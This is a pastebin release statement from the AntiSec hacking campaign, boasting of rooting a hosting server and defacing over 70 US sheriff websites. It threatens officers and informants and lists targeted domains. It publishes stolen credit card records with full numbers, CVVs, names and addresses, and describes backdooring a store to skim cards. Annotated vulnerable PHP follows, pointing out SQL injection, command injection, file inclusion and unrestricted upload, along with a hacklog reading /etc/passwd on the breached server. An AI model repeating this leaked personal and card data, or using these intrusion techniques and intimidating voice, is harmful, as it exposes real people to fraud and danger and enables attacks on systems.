voice

Shooting Sheriffs Saturday | Official Release Statement

Aug 5th, 2011
45,867
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 167.08 KB | None | 0 0
  1. `..--.
  2. `:.#antisec#;:
  3. :antisec#anti;+.`
  4. :sec#antisec#a;/:
  5. ntisec#antisec#+a
  6. .ntisec#antisec;:
  7. `-` +#antisec#anti:s/
  8. /.:+:/+.`..` `;+;ec#antisec::+
  9. :.;;+`-./-:` .+:#antisec#anti-++`
  10. `-` -:.``; `:.+.sec#antisec#a: -;-
  11. `; -:::. `-:+..;/:ntisec#an.-` :+``+-
  12. `.+- `./;.- `-/++++:`.:-;tisec#anti++ -s;`/;//-
  13. `-:` .-:- /::+-` :/+;ec#ant;i;/.. ;s:.;:++.:
  14. `/ .:` `;:/` .+..+///:::/:. /:e;c#a:;/+-`
  15. `:+.. .. .:.;n+/++. `---...```` `tisec#an:/:++-
  16. -::-` `.--` -t:./;:ise./.`.. .:+.;;c#antisec#:.;;
  17. +- .::.` .;:.;antisec;.+;;+` .--:;..:.#;antisec;;/
  18. `.` `++-` ./;;#antisec#a;:nt;i+.` ` ;. `-;sec#an:.`
  19. .:. .;-` t+.isec#;a:;:;;nt;i+::.-`` ..:-` .. .;sec#a+:.
  20. --::...; ..;ntise+c;:-` :;.-`:++.+//:- `/ `;#ant;+:
  21. ./:::.: +::isec;#. `an.. .-/.; -tisec/
  22. `.+.::/``/+:#an:;. .ti+` `./;;:`;+ sec#.+`
  23. /anti:;..sec#; .an. `-+.;+::.-.. ti;+:`:;`
  24. /sec#antise/c `#a- ``-;..//+.+:.-. -ntis:::/;
  25. ec#antisec#:+ /a. ////+//./..+++..` `;nti./:`:`
  26. `sec#antisec#/ /;:+///...+:/.//;;;:././+- `;ant+/;`
  27. isec#antis;. `;ec#antisec#antisec#ant:.:;;. :/:-`
  28. isec#antis: -;ec#antisec#antisec#anti;.- .;/
  29. /sec#antise/ c#antisec#antisec#antis.:-` .
  30. /;;ec#an::. tise.`
  31. `+.c#..+` ;+-.;`
  32. `:/:
  33.  
  34. "Alright Dirty, yall boys ready? Bout to turn drive-bys revolutionary"
  35.  
  36. ////////////////////////////////////////////////////////////////////////////////
  37. ## #FREETOPIARY #FREEMERCEDES #FREEBRADLEYMANNING #SHOOTINNGSHERIFFSSATURDAY ###
  38. ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ##
  39. ////////////////////////////////////////////////////////////////////////////////
  40.  
  41. _ _ __ .__
  42. __| || |__ _____ _____/ |_|__| ______ ____ ____ #anonymous
  43. \ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #antisec
  44. | || | / __ \| | \ | | |\___ \\ ___/\ \___ #lulzsec
  45. /_ ~~ _\ (____ /___| /__| |__/____ >\___ >\___ > #freetopiary
  46. |_||_| \/ \/ \/ \/ \/ #SSS
  47.  
  48.  
  49. ////////////////////////////////////////////////////////////////////////////////
  50. ANTISEC DELIVERS OVER 10GB OF PRIVATE POLICE EMAILS, TRAINING FILES, SNITCH INFO
  51. AND PERSONAL INFO IN RETALIATION FOR ANONYMOUS ARRESTS #ShootingSheriffsSaturday
  52. ////////////////////////////////////////////////////////////////////////////////
  53.  
  54. "Missouri Sheriff's Association Executive Director Mick Covington tells KHQA
  55. that the most the hackers got from their organization were email addresses.
  56. Contrary to AntiSec's announcement, there were no critical details like names,
  57. social security numbers or other personal information details on their server
  58. that was hacked." (DOX AND EMAILS DROPPED)
  59. (http://www.connecttristates.com/news/story.aspx?id=646614)
  60.  
  61. "Based upon past releases of information, the content of these releases are
  62. sometimes manipulated and edited in an attempt of embarrass or discredit
  63. government agencies and law enforcement. Also in their release, they threaten to
  64. publish the names of inmates and confidential informants. Informant and other
  65. sensitive data are not kept on the website, and we believe any information that
  66. would be released would be false in an attempt to hinder future investigations
  67. by law enforcement." - Sheriff John Montgomery (MORE DOX DROPPED)
  68. (http://www.baxterbulletin.com/article/20110801/NEWS01/110801001/BC-Sheriff-
  69. Website-hacked?odyssey=tab|topnews|text|FRONTPAGE)
  70.  
  71. "President of the Missouri Sheriff's Association Steve Cox said he thinks the
  72. hackers claim to have more information than they really do. Cox said the group
  73. just wants glory and fame." (DOX AND SSN DROPPED)
  74. (http://www.komu.com/news/update-group-hacks-missouri-sheriff-s-association/)
  75.  
  76. "Sheriff Joe Guy says, "We've not lost any information. There's no, we've not
  77. been hacked. I think that's been a fear. No sensitive information is on that
  78. website anyway." (DOX AND EMAILS DROPPED AGAIN)
  79. http://wdef.com/news/mcminn_county_sheriffs_department_website/08/2011
  80.  
  81. ////////////////////////////////////////////////////////////////////////////////
  82.  
  83. A week after we defaced and destroyed the websites of over 70 law enforcement
  84. agencies, we are releasing a massive amount of confidential information that is
  85. sure to embarass, discredit and incriminate police officers across the US. Over
  86. 10GB of information was leaked including hundreds of private email spools,
  87. password information, address and social security numbers, credit card numbers,
  88. snitch information, training files, and more. We hope that not only will
  89. dropping this info demonstrate the inherently corrupt nature of law enforcement
  90. using their own words, as well as result in possibly humiliation, firings, and
  91. possible charges against several officers, but that it will also disrupt and
  92. sabotage their ability to communicate and terrorize communities.
  93.  
  94. We are doing this in solidarity with Topiary and the Anonymous PayPal LOIC
  95. defendants as well as all other political prisoners who are facing the gun of
  96. the crooked court system. We stand in support of all those who struggle against
  97. the injustices of the state and capitalism using whatever tactics are most
  98. effective, even if that means breaking their laws in order to expose their
  99. corruption. You may bust a few of us, but we greatly outnumber you, and you can
  100. never stop us from continuing to destroy your systems and leak your data.
  101.  
  102. We have no sympathy for any of the officers or informants who may be endangered
  103. by the release of their personal information. For too long they have been using
  104. and abusing our personal information, spying on us, arresting us, beating us,
  105. and thinking that they can get away with oppressing us in secrecy. Well it's
  106. retribution time: we want them to experience just a taste of the kind of misery
  107. and suffering they inflict upon us on an everyday basis. Let this serve as a
  108. warning to would-be snitches and pigs that your leaders can no longer protect
  109. you: give up and turn on your masters now before it's too late.
  110.  
  111. // A TALE OF TWO OWNINGS
  112.  
  113. It took less than 24 hours to root BJM's server and copy all their data to our
  114. private servers. Soon after, their servers were taken down and a news article
  115. came out suggesting they received advance FBI "credible threat" notice of a
  116. "hacking plot". At this point it was too late for them because the stolen files
  117. were gonna get leaked regardless. However we were surprised and delighted to see
  118. that not only did they relaunch a few sites less than a week later, but that
  119. their "bigger, faster server that offers more security" carried over our
  120. backdoors from their original box. This time we were not going to hesitate to
  121. pull the trigger: in less than an hour we rooted their new server and defaced
  122. all 70+ domains while their root user was still logged in and active.
  123.  
  124. We lol'd as we watched the news reports come in, quoting various Sheriffs who
  125. denied that they were ever hacked, that any personal information was stolen,
  126. that they did not store snitch info on their servers. Many lulz have been had as
  127. we taunted the sheriffs by responding to their denials by tweeting teasers
  128. exposing their SSNs, passwords, addresses, and private emails. We also took the
  129. liberty to backdoor their online store and capture a few credit card numbers,
  130. which were used to make involuntary donations to the ACLU, the EFF, the Bradley
  131. Manning Support Network, and more. Despite active FBI investigations and their
  132. additional security measures, they could not stop us from owning their servers,
  133. stealing their identities, and dropping all their data. Two weeks later only a
  134. few of the sites are up with limited functionality as we scared them into
  135. removing any dynamic PHP scripts, forcing them to use static HTML content.
  136.  
  137. A recent DHS bulletin has called us "script kiddies" that lack "any capability
  138. to inflict damage to critical infrastructure" yet we continue to get in and out
  139. of any system we please, destroying and dropping dox on the mightiest of
  140. government systems that are supposed to be protecting their sick nightmare of
  141. "law and order". GIVE UP. You are losing the cyberwar, and the attacks against
  142. the governments, militaries, and corporations of the world will continue to
  143. escalate.
  144.  
  145. Hackers, join us to make 2011 the year of leaks and revolutions.
  146.  
  147. ////////////////////////////////////////////////////////////////////////////////
  148.  
  149. [*] ORIGINAL DEFACEMENT: http://zone-h.org/mirror/id/14515221)
  150. [*] BROWSE THE LEAK: http://vv7pabmmyr2vnflf.onion/ (ON TOR)
  151. http://vv7pabmmyr2vnflf.tor2web.com/ (NOT TOR)
  152.  
  153. [*] DONATE BITCOINS: 18NHixaoQekQJ3y52aBGJJwgBWX9X3myYR
  154.  
  155. The booty contains:
  156.  
  157. [*] Over 300 mail accounts from 56 law enforcement domains
  158. [*] Missouri Sheriff account dump (mosheriffs.com)
  159. 7000+ usernames, passwords, home addresses, phones and SSNs
  160. [*] Online Police Training Academy files
  161. PDFs, videos, HTML files
  162. [*] "Report a Crime" snitch list compilation (60+ entries)
  163. [*] Plesk plaintext server passwords (ftp/ssh, email, cpanel, protected dirs)
  164.  
  165. ////////////////////////////////////////////////////////////////////////////////
  166.  
  167. Over 70 US law enforcement institutions were attacked including:
  168.  
  169. 20jdpa.com, adamscosheriff.org, admin.mostwantedwebsites.net,
  170. alabamasheriffs.com, arkansassheriffsassociation.com,
  171. bakercountysheriffoffice.org, barrycountysheriff.com, baxtercountysheriff.com,
  172. baxtercountysherifffoundation.org, boonecountyar.com, boonesheriff.com,
  173. cameronso.org, capecountysheriff.org, cherokeecountyalsheriff.com,
  174. cityofgassville.org, cityofwynne.com, cleburnecountysheriff.com,
  175. coahomacountysheriff.com, crosscountyar.org, crosscountysheriff.org,
  176. drewcountysheriff.com, faoret.com, floydcountysheriff.org, fultoncountyso.org,
  177. georgecountymssheriff.com, grantcountyar.com, grantcountysheriff-collector.com,
  178. hodgemansheriff.us, hotspringcountysheriff.com, howardcountysheriffar.com,
  179. izardcountyar.org, izardcountysheriff.org, izardhometownhealth.com,
  180. jacksonsheriff.org, jeffersoncountykssheriff.com, jeffersoncountyms.gov,
  181. jocomosheriff.org, johnsoncosheriff.com, jonesso.com, kansassheriffs.org,
  182. kempercountysheriff.com, knoxcountysheriffil.com, lawrencecosheriff.com,
  183. lcsdmo.com, marioncountysheriffar.com, marionsoal.com, mcminncountysheriff.com,
  184. meriwethercountysheriff.org, monroecountysheriffar.com, mosheriffs.com,
  185. mostwantedgovernmentwebsites.com, mostwantedwebsites.net,
  186. newtoncountysheriff.org, perrycountysheriffar.org, plymouthcountysheriff.com,
  187. poalac.org, polkcountymosheriff.org, prairiecountysheriff.org,
  188. prattcountysheriff.com, prentisscountymssheriff.com, randolphcountysheriff.org,
  189. rcpi-ca.org, scsosheriff.org, sebastiancountysheriff.com, sgcso.com,
  190. sharpcountysheriff.com, sheriffcomanche.com, stfranciscountyar.org,
  191. stfranciscountysheriff.org, stonecountymosheriff.com, stonecountysheriff.com,
  192. talladegasheriff.org, tatecountysheriff.com, tishomingocountysheriff.com,
  193. tunicamssheriff.com, vbcso.com, woodsonsheriff.com
  194.  
  195. ////////////////////////////////////////////////////////////////////////////////
  196.  
  197. Stolen Credit Card information from mosheriffs.com online store:
  198.  
  199. Jeremy,Searcy,[email protected],417-887-3626,MasterCard,5191000109460087,2,2014,
  200. 102,3526 W Nichols,,Springfield,MO,65803
  201.  
  202. Robert,Zoellr,[email protected],954-529-0840,Visa,4388540016715210,11,2012,501,401
  203. E Las Olas Blvd ,Suite 130-143,FT Lauderdale ,FL,33301,571 Elbow Cay
  204. Drive,Camden,Osage Beach,MO,65065
  205.  
  206. Jeffrey,Thomas,[email protected],573-529-1836,MasterCard,5109820390825461,2,2013,
  207. 768,417 North Locust Street,,Richland,MO,65556
  208.  
  209. nathan,vails,[email protected],573-225-3010,Visa,4607174190144503,7,2013
  210. ,237,35984 Hwy 25,,malden,MO,63863
  211.  
  212. David,Yingling,[email protected],573-335-5286,MasterCard,5200011252796077,
  213. 5,2014,739,617 Peironnet Drive,,Cape Girardeau,MO,63701
  214.  
  215. Mark,Bell,[email protected],417 830
  216. 3410,MasterCard,5441840150712888,5,2012,094,8117 West Farm Road
  217. 168,,Republic,MO,65738
  218.  
  219. ////////////////////////////////////////////////////////////////////////////////
  220. For the Blackhat & DEFCON conferences, we figure yall should hear it straight
  221. from some real black hats. It's time to bust out the old school hacklog and mock
  222. how vulnerable and insecure our enemies in blue really are.
  223. ////////////////////////////////////////////////////////////////////////////////
  224.  
  225. ////////////////////////////////////////////////////////////////////////////////
  226. // CONNECT.PHP
  227. // SAFE_QUERY()... WAY TO MAKE SQL INJECTIONS WORSE BY NOT VALIDATING INPUT ...
  228. // BUT INSTEAD PASSING RAW INPUT TO SHELL_EXEC() ALLOWING COMMAND EXECUTION !!!
  229. ////////////////////////////////////////////////////////////////////////////////
  230.  
  231. <?
  232. $i = 0;
  233. $path = '';
  234. while(!is_file($path."admin/config/classes/dymin_main.php")){
  235. $path .= '../';
  236. $i++;
  237. if($i>10){
  238. $path = '';
  239. break;
  240. }
  241. }
  242. include($path."admin/config/dymin_config.php");
  243.  
  244. function safe_query($query){
  245. if(strpos(getcwd(),'admin')){
  246. shell_exec("echo '".date("Y-m-d H:i:s")."|".$query."' >>
  247. /var/sql_logs/".str_replace("www.","",$_SERVER['HTTP_HOST'].""));
  248. }
  249. $database = DATABASE;
  250. $username = DATABASE_USER;
  251. $password = DATABASE_PASS;
  252. $destination = DATABASE_HOST;
  253. mysql_connect($destination, $username, $password) or die("<br>Unable to
  254. connect to database: <br>". mysql_error());
  255. mysql_select_db($database) or die ("<br> Unable to select
  256. database[$database]: <br>" . mysql_error());
  257. $result = mysql_query($query);
  258. return $result;
  259. }
  260. ?>
  261.  
  262.  
  263. ////////////////////////////////////////////////////////////////////////////////
  264. // VERIFY_LOGIN.PHP
  265. // ITS BEEN A HOT MINUTE SINCE I'VE SEEN ' OR 'a'='a SQL INJECTIONS WORK
  266. // BUT BJM NEVER FAILS TO DELIVER THE MOST OBVIOUS OF VULNERABILITIES
  267. ////////////////////////////////////////////////////////////////////////////////
  268.  
  269. <?php
  270. session_start();
  271. $username = $_GET['username'];
  272. $password = $_GET['password'];
  273.  
  274. include "../config/connect.php";
  275. sleep(2);
  276. $query = "select * from dymin_user where username = '$username' and password =
  277. '$password'";
  278. $result = safe_query($query);
  279.  
  280. $num = mysql_num_rows($result);
  281. if($num == ''){
  282. echo "<img src=\"images/login_deny.gif\">";
  283. }else{
  284. $id = mysql_result($result,0,'id');
  285. $level = mysql_result($result,0,'level');
  286. $_SESSION['user_id'] = $id;
  287. $_SESSION['username'] = $username;
  288. $_SESSION['password'] = $password;
  289. $_SESSION['level'] = $level;
  290. }
  291. ?>
  292.  
  293.  
  294. ////////////////////////////////////////////////////////////////////////////////
  295. // RENAME_FILE.PHP
  296. // PASSING RAW USER-SUPPLIED INPUT TO RENAME AND INCLUDE FUNCTIONS ...
  297. // TWO VULNERABILITIES FOR THE PRICE OF ONE!!
  298. ////////////////////////////////////////////////////////////////////////////////
  299.  
  300. <?
  301. error_reporting(E_ALL);
  302. ini_set('display_errors', '1');
  303. include "../../admin/config/connect.php";
  304.  
  305. $filename = $_POST['name'];
  306. $type = $_POST['type'];
  307. $uploads_dir_path_with_date = '../../uploads/'.date("Ymd").'/';
  308. $uploads_dir_path = '../../uploads/'.date("Ymd").'/';
  309. $uploads_dir_path_no_date = '../../uploads/';
  310. if(!is_file($uploads_dir_path_no_date.'log.txt')){
  311. $fh = fopen("$uploads_dir_path_no_date"."log.txt",'w');
  312. shell_exec("chmod 777 $uploads_dir_path_with_date"."log.txt");
  313. fclose($fh);
  314. }
  315.  
  316. if(!is_dir($uploads_dir_path_with_date)){
  317. mkdir($uploads_dir_path_with_date,'0777');
  318. shell_exec("chmod 777 $uploads_dir_path_with_date");
  319. }
  320. $id = $_GET['id'];
  321.  
  322. $new_name = md5(microtime().$filename.mt_rand(10000, 32000));
  323. rename("$uploads_dir_path_no_date$filename","$uploads_dir_path_with_date$
  324. new_name$type");
  325.  
  326. //write file upload log
  327. $fh = fopen("$uploads_dir_path_no_date"."log.txt",'a');
  328. $log_info = 'DATE: '.date("m-d-Y His")."\t";
  329. $log_info .= 'HTTP_HOST: '.$_SERVER['HTTP_HOST']."\t";
  330. $log_info .= 'REMOTE_ADDR: '.$_SERVER['REMOTE_ADDR']."\t";
  331. $log_info .= 'SCRIPT_FILENAME: '.$_SERVER['SCRIPT_FILENAME']."\t";
  332. $log_info .= 'OLD_FILENAME: '.$filename."\t";
  333. $log_info .= 'NEW_FILENAME: '.$new_name."\t\n";
  334. fwrite($fh,$log_info);
  335. fclose($fh);
  336. unset($fh,$log_info);
  337.  
  338. $file_to_include = $_GET['filename'];
  339.  
  340. include "$file_to_include";
  341. ?>
  342.  
  343. ////////////////////////////////////////////////////////////////////////////////
  344. // UPLOADIFY.PHP
  345. // WAY TO GO, COMMENTING OUT THE FILE EXTENSION VALIDATING CODE
  346. ////////////////////////////////////////////////////////////////////////////////
  347.  
  348. <?php
  349. if (!empty($_FILES)) {
  350. $tempFile = $_FILES['Filedata']['tmp_name'];
  351. $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
  352. $targetFile = str_replace('//','/',$targetPath) .
  353. $_FILES['Filedata']['name'];
  354.  
  355. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
  356. // $fileTypes = str_replace(';','|',$fileTypes);
  357. // $typesArray = split('\|',$fileTypes);
  358. // $fileParts = pathinfo($_FILES['Filedata']['name']);
  359.  
  360. // if (in_array($fileParts['extension'],$typesArray)) {
  361. // Uncomment the following line if you want to make the directory if it
  362. doesn't exist
  363. // mkdir(str_replace('//','/',$targetPath), 0755, true);
  364.  
  365. move_uploaded_file($tempFile,$targetFile);
  366. echo "1";
  367. // } else {
  368. // echo 'Invalid file type.';
  369. // }
  370. }
  371. ?>
  372.  
  373. ////////////////////////////////////////////////////////////////////////////////
  374. // SHOW_IMAGE_DOWNLOAD.PHP
  375. // HEY LETS TAKE RAW USER INPUT AND PASS IT TO READFILE() ...
  376. // AT LEAST THEY HAD THE COURTESY OF VERIFYING IS_FILE() FOR US!!!
  377. ////////////////////////////////////////////////////////////////////////////////
  378.  
  379. <? include "config/header.php"; ?>
  380. <?php
  381. $filename = $_GET['filename'];
  382. if(is_file($filename)) {
  383. header("Pragma: public");
  384. header("Expires: 0");
  385. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
  386. header("Content-Type: application/force-download");
  387. header("Content-Type: application/octet-stream");
  388. header("Content-Type: application/download");
  389. header("Content-Disposition: attachment; filename=".basename($filename).";");
  390. header("Content-Transfer-Encoding: binary");
  391. header("Content-Length: ".filesize($filename));
  392. readfile("$filename");
  393. exit();
  394. }
  395. ?>
  396.  
  397. ////////////////////////////////////////////////////////////////////////////////
  398. // UPLOAD_SCANNER.SH
  399. // UH OH... THEY ARE CLOSING IN ON OUR C99 SHELL!!! PLEASE...
  400. ////////////////////////////////////////////////////////////////////////////////
  401.  
  402. #!/bin/bash
  403. #
  404. # Scan for PHP in upload folders
  405. #
  406. EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e
  407. watermark_recalled_photo.php"
  408. lineify (){
  409. for i in $*
  410. do
  411. echo $i
  412. done
  413. }
  414. # testing
  415. #EXCLUDES="numnum"
  416. #
  417. UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \
  418. grep -v $EXCLUDES)
  419. if [ "${UHOH}xx" != "xx" ]
  420. then
  421. lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO
  422.  
  423.  
  424. ////////////////////////////////////////////////////////////////////////////////
  425. // ENOUGH TALK... TIME TO RIDE ON THESE PIG MOTHAFUCKAS !!! BRING ON THE HACKLOG
  426. ////////////////////////////////////////////////////////////////////////////////
  427. $ ls -al /var/www/vhosts/
  428. total 332
  429. drwxr-xr-x 83 root root 4096 Jul 20 11:33 .
  430. drwxr-xr-x 9 root root 4096 Aug 30 2010 ..
  431. drwxr-xr-x 3 root root 4096 Dec 21 2009 .skel
  432. drwxr-xr-x 13 root root 4096 Apr 7 2010 20jdpa.com
  433. drwxr-xr-x 14 root root 4096 Jun 22 10:59 adamscosheriff.org
  434. drwxr-xr-x 13 root root 4096 Nov 30 2010 admin.mostwantedwebsites.net
  435. drwxr-xr-x 13 root root 4096 Nov 30 2010 alabamasheriffs.com
  436. drwxr-xr-x 14 root root 4096 May 3 09:44 arkansassheriffsassociation.com
  437. drwxr-xr-x 13 root root 4096 Nov 30 2010 bakercountysheriffoffice.org
  438. drwxr-xr-x 13 root root 4096 Apr 7 2010 barrycountysheriff.com
  439. drwxr-xr-x 14 root root 4096 Apr 7 2010 baxtercountysheriff.com
  440. drwxr-xr-x 14 root root 4096 Jun 10 09:59 baxtercountysherifffoundation.org
  441. drwxr-xr-x 13 root root 4096 Apr 7 2010 boonecountyar.com
  442. drwxr-xr-x 14 root root 4096 May 10 2010 boonesheriff.com
  443. drwxr-xr-x 13 root root 4096 Nov 30 2010 cameronso.org
  444. drwxr-xr-x 13 root root 4096 Nov 30 2010 capecountysheriff.org
  445. drwxr-xr-x 14 root root 4096 Apr 7 2010 cherokeecountyalsheriff.com
  446. drwxr-xr-x 13 root root 4096 Apr 7 2010 cherokeecountykssheriff.com
  447. drwxr-xr-x 9 root root 4096 Dec 21 2009 chroot
  448. drwxr-xr-x 14 root root 4096 May 19 11:36 cityofgassville.org
  449. drwxr-xr-x 13 root root 4096 Apr 7 2010 cityofwynne.com
  450. drwxr-xr-x 13 root root 4096 Apr 7 2010 cleburnecountysheriff.com
  451. drwxr-xr-x 13 root root 4096 May 26 2010 coahomacountysheriff.com
  452. drwxr-xr-x 13 root root 4096 Apr 7 2010 crosscountyar.org
  453. drwxr-xr-x 14 root root 4096 Apr 7 2010 crosscountysheriff.org
  454. drwxr-xr-x 5 root root 4096 Oct 16 2009 default
  455. drwxr-xr-x 13 root root 4096 Apr 7 2010 drewcountysheriff.com
  456. drwxr-xr-x 13 root root 4096 May 26 2010 faoret.com
  457. drwxr-xr-x 13 root root 4096 Nov 30 2010 floydcountysheriff.org
  458. drwxr-xr-x 14 root root 4096 Mar 24 10:11 fultoncountyso.org
  459. drwxr-xr-x 13 root root 4096 Nov 30 2010 georgecountymssheriff.com
  460. drwxr-xr-x 13 root root 4096 Apr 7 2010 grantcountyar.com
  461. drwxr-xr-x 13 root root 4096 Apr 7 2010 grantcountysheriff-collector.com
  462. drwxr-xr-x 13 root root 4096 Apr 7 2010 hodgemansheriff.us
  463. drwxr-xr-x 13 root root 4096 Apr 7 2010 hotspringcountysheriff.com
  464. drwxr-xr-x 14 root root 4096 Oct 19 2010 howardcountysheriffar.com
  465. drwxr-xr-x 13 root root 4096 Apr 7 2010 izardcountyar.org
  466. drwxr-xr-x 13 root root 4096 Apr 7 2010 izardcountysheriff.org
  467. drwxr-xr-x 13 root root 4096 Apr 7 2010 izardhometownhealth.com
  468. drwxr-xr-x 13 root root 4096 Apr 7 2010 jacksonsheriff.org
  469. drwxr-xr-x 14 root root 4096 Jun 30 2010 jeffersoncountykssheriff.com
  470. drwxr-xr-x 14 root root 4096 Feb 4 16:03 jeffersoncountyms.gov
  471. drwxr-xr-x 14 root root 4096 Apr 7 2010 jocomosheriff.org
  472. drwxr-xr-x 13 root root 4096 Apr 7 2010 johnsoncosheriff.com
  473. drwxr-xr-x 14 root root 4096 Jun 11 2010 jonesso.com
  474. drwxr-xr-x 14 root root 4096 Jun 24 16:36 kansassheriffs.org
  475. drwxr-xr-x 13 root root 4096 May 26 2010 kempercountysheriff.com
  476. drwxr-xr-x 13 root root 4096 Nov 30 2010 knoxcountysheriffil.com
  477. drwxr-xr-x 14 root root 4096 Apr 7 2010 lawrencecosheriff.com
  478. drwxr-xr-x 15 root root 4096 Jun 8 08:55 lcsdmo.com
  479. drwxr-xr-x 14 root root 4096 Jan 26 09:40 marioncountysheriffar.com
  480. drwxr-xr-x 13 root root 4096 Nov 30 2010 marionsoal.com
  481. drwxr-xr-x 13 root root 4096 Apr 7 2010 mcminncountysheriff.com
  482. drwxr-xr-x 13 root root 4096 Nov 30 2010 meriwethercountysheriff.org
  483. drwxr-xr-x 13 root root 4096 May 26 2010 monroecountysheriffar.com
  484. drwxr-xr-x 13 root root 4096 Apr 7 2010 mosheriffs.com
  485. drwxr-xr-x 13 root root 4096 Apr 7 2010 mostwantedgovernmentwebsites.com
  486. drwxr-xr-x 13 root root 4096 Apr 7 2010 mostwantedwebsites.net
  487. drwxr-xr-x 13 root root 4096 Apr 7 2010 newtoncountysheriff.org
  488. drwxr-xr-x 13 root root 4096 Nov 30 2010 perrycountysheriffar.org
  489. drwxr-xr-x 13 root root 4096 Apr 7 2010 plymouthcountysheriff.com
  490. drwxr-xr-x 14 root root 4096 Apr 21 08:36 poalac.org
  491. drwxr-xr-x 13 root root 4096 Apr 7 2010 polkcountymosheriff.org
  492. drwxr-xr-x 14 root root 4096 Dec 9 2010 prairiecountysheriff.org
  493. drwxr-xr-x 15 root root 4096 Jun 1 2010 prattcountysheriff.com
  494. drwxr-xr-x 14 root root 4096 Jun 10 13:49 prentisscountymssheriff.com
  495. drwxr-xr-x 13 root root 4096 Nov 30 2010 randolphcountysheriff.org
  496. drwxr-xr-x 14 root root 4096 May 6 09:25 rcpi-ca.org
  497. drwxr-xr-x 13 root root 4096 Apr 7 2010 scsosheriff.org
  498. drwxr-xr-x 13 root root 4096 Apr 7 2010 sebastiancountysheriff.com
  499. drwxr-xr-x 13 root root 4096 Nov 30 2010 sgcso.com
  500. drwxr-xr-x 13 root root 4096 Apr 7 2010 sharpcountysheriff.com
  501. drwxr-xr-x 14 root root 4096 Mar 23 11:41 sheriffcomanche.com
  502. drwxr-xr-x 14 root root 4096 Jun 6 13:54 stfranciscountyar.org
  503. drwxr-xr-x 14 root root 4096 Nov 30 2010 stfranciscountysheriff.org
  504. drwxr-xr-x 14 root root 4096 Nov 30 2010 stonecountymosheriff.com
  505. drwxr-xr-x 14 root root 4096 Oct 27 2010 stonecountysheriff.com
  506. drwxr-xr-x 14 root root 4096 Jun 9 11:51 talladegasheriff.org
  507. drwxr-xr-x 13 root root 4096 Apr 7 2010 tatecountysheriff.com
  508. drwxr-xr-x 13 root root 4096 Nov 30 2010 tishomingocountysheriff.com
  509. drwxr-xr-x 13 root root 4096 Apr 7 2010 tunicamssheriff.com
  510. drwxr-xr-x 14 root root 4096 Apr 7 2010 vbcso.com
  511. drwxr-xr-x 13 root root 4096 May 26 2010 woodsonsheriff.com
  512.  
  513. // DAMN THATS A LOT OF DOMAINS... TOO BAD ZONE-H MASS DEFACEMENT NOTIFICATION
  514. // FORM ONLY ALLOWS YOU TO SUBMIT 10 PER REQUEST... GONNA TAKE FOREVER
  515.  
  516. $ cat /etc/passwd
  517. root:x:0:0:root:/root:/bin/bash
  518. bin:x:1:1:bin:/bin:/sbin/nologin
  519. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  520. adm:x:3:4:adm:/var/adm:/sbin/nologin
  521. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  522. sync:x:5:0:sync:/sbin:/bin/sync
  523. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  524. halt:x:7:0:halt:/sbin:/sbin/halt
  525. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  526. news:x:9:13:news:/etc/news:
  527. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  528. operator:x:11:0:operator:/root:/sbin/nologin
  529. games:x:12:100:games:/usr/games:/sbin/nologin
  530. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  531. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  532. nobody:x:99:99:Nobody:/:/sbin/nologin
  533. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  534. dbus:x:81:81:System message bus:/:/sbin/nologin
  535. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  536. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  537. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  538. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  539. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  540. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  541. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  542. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  543. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  544. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  545. webdept:x:500:500::/home/webdept:/bin/bash
  546. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  547. avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
  548. named:x:25:25:Named:/var/named:/sbin/nologin
  549. xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
  550. apache:x:48:48:Apache:/var/www:/sbin/nologin
  551. distcache:x:94:94:Distcache:/:/sbin/nologin
  552. mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
  553. ntp:x:38:38::/etc/ntp:/sbin/nologin
  554. sw-cp-server:x:501:501::/:/bin/true
  555. psaadm:x:502:502:Plesk user:/usr/local/psa/admin:/sbin/nologin
  556. popuser:x:110:31:POP3 service user:/var/qmail/popuser:/sbin/nologin
  557. mhandlers-user:x:30:31:mail handlers user:/:/sbin/nologin
  558. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  559. psaftp:x:503:504:anonftp psa user:/:/sbin/nologin
  560. alias:x:2021:2020:Qmail User:/var/qmail/alias:/sbin/nologin
  561. qmaild:x:2020:2020:Qmail User:/var/qmail/:/sbin/nologin
  562. qmaill:x:2022:2020:Qmail User:/var/qmail/:/sbin/nologin
  563. qmailp:x:2023:2020:Qmail User:/var/qmail/:/sbin/nologin
  564. qmailq:x:2520:2520:Qmail User:/var/qmail/:/sbin/nologin
  565. qmailr:x:2521:2520:Qmail User:/var/qmail/:/sbin/nologin
  566. qmails:x:2522:2520:Qmail User:/var/qmail/:/sbin/nologin
  567. postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
